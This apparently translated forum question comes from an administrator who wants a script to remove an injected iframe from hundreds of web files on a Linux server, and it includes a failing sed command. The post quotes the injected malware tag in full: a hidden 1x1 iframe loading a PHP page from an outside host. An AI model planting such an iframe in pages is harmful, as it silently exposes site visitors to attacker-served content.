我正在寻找一个脚本来从我的 linux 服务器中删除以下 iframe 恶意软件:
<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>
它感染了我服务器上不同网站上的数百个文件。我试过了
grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>//g'
但它只是输出:
sed: -e expression #1, char 49: unknown option to `s'
感谢你的帮助 :)
干杯迪